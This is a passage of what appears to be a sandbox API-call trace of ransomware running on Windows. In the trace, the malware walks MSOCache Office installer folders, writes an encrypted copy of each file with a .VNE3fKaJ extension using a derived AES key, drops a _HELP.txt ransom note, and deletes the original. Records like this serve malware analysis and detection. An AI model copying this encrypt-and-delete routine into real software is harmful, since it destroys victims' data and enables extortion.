lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0121.222] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0121.222] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Setup.xml", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Setup.xml", lpUsedDefaultChar=0x0) returned 10 [0121.222] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000000, hTemplateFile=0x0) returned 0x388 [0121.223] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.VNE3fKaJ" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml.vne3fkaj"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0121.237] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52128) returned 1 [0121.237] CryptCreateHash (in: hProv=0xa52128, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0121.237] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0121.237] CryptDeriveKey (in: hProv=0xa52128, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0121.237] GetFileSize (in: hFile=0x388, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x978 [0121.237] ReadFile (in: hFile=0x388, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0121.253] CryptDestroyHash (hHash=0x284d528) returned 1 [0121.253] CryptDestroyKey (hKey=0x284d568) returned 1 [0121.253] CryptReleaseContext (hProv=0xa52128, dwFlags=0x0) returned 1 [0121.254] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\_HELP.txt" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\_help.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x326bfec, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0121.254] GetFileType (hFile=0x340) returned 0x1 [0121.254] GetLastError () returned 0x0 [0121.254] SetLastError (dwErrCode=0x0) [0121.254] GetLastError () returned 0x0 [0121.254] SetLastError (dwErrCode=0x0) [0121.254] WriteFile (in: hFile=0x340, lpBuffer=0x326ac20*, nNumberOfBytesToWrite=0xed, lpNumberOfBytesWritten=0x326ac1c, lpOverlapped=0x0 | out: lpBuffer=0x326ac20*, lpNumberOfBytesWritten=0x326ac1c*=0xed, lpOverlapped=0x0) returned 1 [0121.255] CloseHandle (hObject=0x340) returned 1 [0121.256] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0121.257] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0121.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WordLR.cab", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WordLR.cab", lpUsedDefaultChar=0x0) returned 11 [0121.257] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0121.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WordMUI.msi", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WordMUI.msi", lpUsedDefaultChar=0x0) returned 12 [0121.257] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000000, hTemplateFile=0x0) returned 0x340 [0121.257] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi.VNE3fKaJ" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.msi.vne3fkaj"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388 [0121.258] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52128) returned 1 [0121.259] CryptCreateHash (in: hProv=0xa52128, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0121.259] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0121.259] CryptDeriveKey (in: hProv=0xa52128, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0121.259] GetFileSize (in: hFile=0x340, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x267e00 [0121.259] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0121.657] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0121.657] CryptDestroyKey (hKey=0x284d568) returned 1 [0121.657] CryptReleaseContext (hProv=0xa52128, dwFlags=0x0) returned 1 [0121.658] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\_HELP.txt" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\_help.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x326bfec, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388 [0121.659] GetFileType (hFile=0x388) returned 0x1 [0121.659] GetLastError () returned 0xb7 [0121.659] SetLastError (dwErrCode=0xb7) [0121.661] GetLastError () returned 0xb7 [0121.661] SetLastError (dwErrCode=0xb7) [0121.661] WriteFile (in: hFile=0x388, lpBuffer=0x326ac20*, nNumberOfBytesToWrite=0xed, lpNumberOfBytesWritten=0x326ac1c, lpOverlapped=0x0 | out: lpBuffer=0x326ac20*, lpNumberOfBytesWritten=0x326ac1c*=0xed, lpOverlapped=0x0) returned 1 [0121.661] CloseHandle (hObject=0x388) returned 1 [0121.662] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.msi")) returned 1 [0121.667] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0121.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WordMUI.xml", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WordMUI.xml", lpUsedDefaultChar=0x0) returned 12 [0121.667] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000000, hTemplateFile=0x0) returned 0x388 [0121.667] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.VNE3fKaJ" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml.vne3fkaj"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x38c [0121.706] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52128) returned 1 [0121.707] CryptCreateHash (in: hProv=0xa52128, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0121.707] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0121.707] CryptDeriveKey (in: hProv=0xa52128, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0121.707] GetFileSize (in: hFile=0x388, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x708 [0121.707] ReadFile (in: hFile=0x388, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0121.717] CryptDestroyHash (hHash=0x284d528) returned 1 [0121.717] CryptDestroyKey (hKey=0x284d568) returned 1 [0121.717] CryptReleaseContext (hProv=0xa52128, dwFlags=0x0) returned 1 [0121.717] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\_HELP.txt" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\_help.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x326bfec, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x38c [0121.718] GetFileType (hFile=0x38c) returned 0x1 [0121.718] GetLastError () returned 0xb7 [0121.718] SetLastError (dwErrCode=0xb7) [0121.718] GetLastError () returned 0xb7 [0121.718] SetLastError (dwErrCode=0xb7) [0121.718] WriteFile (in: hFile=0x38c, lpBuffer=0x326ac20*, nNumberOfBytesToWrite=0xed, lpNumberOfBytesWritten=0x326ac1c, lpOverlapped=0x0 | out: lpBuffer=0x326ac20*, lpNumberOfBytesWritten=0x326ac1c*=0xed, lpOverlapped=0x0) returned 1 [0121.719] CloseHandle (hObject=0x38c) returned 1 [0121.719] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml")) returned 1 [0121.720] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 0 [0121.720] FindClose (in: hFindFile=0x284d4e8 | out: hFindFile=0x284d4e8) returned 1 [0121.720] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0121.720] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 0x284d4e8 [0121.733] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0121.733] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0121.733] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0121.733] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\*", lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 0x284d5a8 [0121.733] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0121.733] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0121.733] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0121.733] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Proof.cab", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Proof.cab", lpUsedDefaultChar=0x0) returned 10 [0121.733] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0121.733] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Proof.msi", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Proof.msi", lpUsedDefaultChar=0x0) returned 10 [0121.733] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000000, hTemplateFile=0x0) returned 0x388 [0121.734] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi.VNE3fKaJ" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi.vne3fkaj"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390 [0121.734] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52128) returned 1 [0121.735] CryptCreateHash (in: hProv=0xa52128, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0121.735] CryptHashData (hHash=0x284d568, pbData=0x2823180, dwDataLen=0x100, dwFlags=0x0) returned 1 [0121.735] CryptDeriveKey (in: hProv=0xa52128, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0121.735] GetFileSize (in: hFile=0x388, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xd5c00 [0121.735] ReadFile (in: hFile=0x388, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0121.823] CryptDestroyHash (hHash=0x284d568) returned 1 [0121.823] CryptDestroyKey (hKey=0x284d528) returned 1 [0121.823] CryptReleaseContext (hProv=0xa52128, dwFlags=0x0) returned 1 [0121.911] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi")) returned 1 [0121.918] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0121.918] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Proof.xml", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Proof.xml", lpUsedDefaultChar=0x0) returned 10 [0122.003] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0122.004] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0122.004] CryptHashData (hHash=0x284d5e8, pbData=0x2823180, dwDataLen=0x100, dwFlags=0x0) returned 1 [0122.004] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0122.004] GetFileSize (in: hFile=0x388, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x543 [0122.004] ReadFile (in: hFile=0x388, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0122.021] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0122.021] CryptDestroyKey (hKey=0x284d528) returned 1 [0122.021] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0122.022] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml")) returned 1 [0122.023] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 0 [0122.023] FindClose (in: hFindFile=0x284d5a8 | out: hFindFile=0x284d5a8) returned 1 [0122.023] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0122.024] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0122.024] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0122.024] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0122.024] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Proof.cab", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Proof.cab", lpUsedDefaultChar=0x0) returned 10 [0122.024] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0122.024] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Proof.msi", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Proof.msi", lpUsedDefaultChar=0x0) returned 10 [0122.025] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0122.026] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0122.026] CryptHashData (hHash=0x284d568, pbData=0x2823180, dwDataLen=0x100, dwFlags=0x0) returned 1 [0122.026] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0122.026] GetFileSize (in: hFile=0x394, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xd7200 [0122.026] ReadFile (in: hFile=0x394, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0122.090] CryptDestroyHash (hHash=0x284d568) returned 1 [0122.090] CryptDestroyKey (hKey=0x284d528) returned 1 [0122.090] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0122.090] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.msi")) returned 1 [0122.097] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0122.097] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Proof.xml", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Proof.xml", lpUsedDefaultChar=0x0) returned 10 [0122.159] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0122.160] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0122.160] CryptHashData (hHash=0x284d5e8, pbData=0x2823180, dwDataLen=0x100, dwFlags=0x0) returned 1 [0122.160] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0122.160] GetFileSize (in: hFile=0x388, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x5b1 [0122.160] ReadFile (in: hFile=0x388, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0122.170] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0122.170] CryptDestroyKey (hKey=0x284d528) returned 1 [0122.170] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0122.171] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml")) returned 1 [0122.172] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 0 [0122.172] FindClose (in: hFindFile=0x284d5a8 | out: hFindFile=0x284d5a8) returned 1 [0122.172] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0122.173] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0122.173] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0122.173] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0122.173] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Proof.cab", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Proof.cab", lpUsedDefaultChar=0x0) returned 10 [0122.173] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0122.173] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Proof.msi", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Proof.msi", lpUsedDefaultChar=0x0) returned 10 [0122.173] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0122.174] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0122.174] CryptHashData (hHash=0x284d568, pbData=0x2823180, dwDataLen=0x100, dwFlags=0x0) returned 1 [0122.174] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0122.174] GetFileSize (in: hFile=0x394, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xd8400 [0122.174] ReadFile (in: hFile=0x394, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0122.279] CryptDestroyHash (hHash=0x284d568) returned 1 [0122.279] CryptDestroyKey (hKey=0x284d528) returned 1 [0122.279] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0122.315] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.msi")) returned 1 [0122.322] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0122.322] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Proof.xml", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Proof.xml", lpUsedDefaultChar=0x0) returned 10 [0122.362] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0122.363] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0122.363] CryptHashData (hHash=0x284d5e8, pbData=0x2823180, dwDataLen=0x100, dwFlags=0x0) returned 1 [0122.363] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0122.363] GetFileSize (in: hFile=0x388, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x5b2 [0122.363] ReadFile (in: hFile=0x388, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0122.372] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0122.372] CryptDestroyKey (hKey=0x284d528) returned 1 [0122.372] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0122.374] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml")) returned 1 [0122.374] FindNextFileW (in: 